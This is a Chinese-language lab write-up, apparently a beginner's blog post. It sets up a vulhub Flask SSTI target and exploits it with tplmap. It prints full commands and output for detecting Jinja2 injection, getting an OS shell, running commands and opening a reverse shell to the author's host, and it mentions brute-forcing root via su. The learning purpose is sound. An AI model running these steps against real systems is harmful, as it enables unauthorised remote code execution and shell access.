搭建靶机环境
这里我用了vulhub集合.
国内一键安装脚本
curl -sSL https://get.daocloud.io/docker | sh
安装完成后用root应该可以直接使用,我将root添加进了docker用户组
启动docker
sudo systemctl start docker
验证是否正确
sudo docker run hello-world
添加进系统启动项
sudo systemctl enable docker
安装docker-compose
pip install docker-compose
下载vulhub
git clone https://github.com/vulhub/vulhub.git
进入flask/ssti中之后docker-compose build & docker-compose up -d
即可启动容器
访问ip的8000端口如出现如下界面则启动成功
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-G0KEaSjZ-1611073745638)(ssti/image-20210116213526726.png)]
SSTI介绍
ssti即server-side-template-injection(大概),具体参考一篇文章带你理解漏洞之SSTI漏洞
渗透尝试
ssti需要猜测目标机器接收的参数,因此使用自动化工具来检测是个不错的选择,在这里我使用tplmap
后来发现tplmap只能判断参数能否形成注入,不能检测可注入的参数名称
安装tplmap
我使用的是kali虚拟机,git clone https://github.com/epinna/tplmap
期间安装了下pip遇到很多问题.特此提示:自行编译注意版本
要安装pip,请安全下载get-pip.py](https://bootstrap.pypa.io/get-pip.py)
python get-pip.py
即可为指定版本安装pip
我先安装python3后生成了pip,pip3,pip3.8
再安装python2后覆盖了pip,实现了共存
tplmap为python2
安装requirements后即可使用
tplmap尝试
┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa"
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options:
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-shell
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Run commands on the operating system.
posix-linux $ ls
app.py
可见此时已经可以在终端执行命令
或者也可以直接执行命令:
./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-cmd "ls /"
手动尝试
上述操作并没有产生什么有用的效果,我们手动尝试学习一下原理
没看懂(摔)
大概看懂了怎么个注入方法,python的话就是随便找一个类然后找到基类然后找到可以import os的类然后利用os执行系统操作,但比较麻烦.我们还是回来继续研究tplmap
tplmap再体验
刚刚我们尝试了–os-shell和–os-cmd执行操作指令,但无法执行的指令是无回显的,就比较难受,接下来我们利用反弹shell来在本地执行指令
首先我在本地开放了一个5656端口,然后
┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --engine=jinja2 --reverse-shell 115.154.195.137 5656
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Incoming connection accepted
/bin/sh: 0: can't access tty; job control turned off
$ ls
app.py
$ whoami
www-data
$ $ mkdir aa
mkdir: cannot create directory ‘aa’: Permission denied
可以看到我们可以直接在本地输入指令
大概原理我猜测是这样的,目标主机建立一个tcp请求,并调用bash,重定向输入输出到tcp请求
通过执行ps aux可以看到确实如此
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3DQGbJnF-1611073745640)(ssti/image-20210117121407894.png)]
这样的一个好处就是权限不允许可以很清楚的看到
接下来我只能想到利用su来暴力破解root账户密码了
除此之外还有--bind-shell PORT
,--upload LOCAL REMOTE
,--download REMOTE LOCAL
三种操作,不过尝试失败了哈哈哈哈哈哈
总结
明白了ssti的攻击原理,初步了解了splmap的安装与应用
虽然没有想到接下来还能做什么不过也算是入门的第一步吧
以及
原理是真的难,脚本小子好爽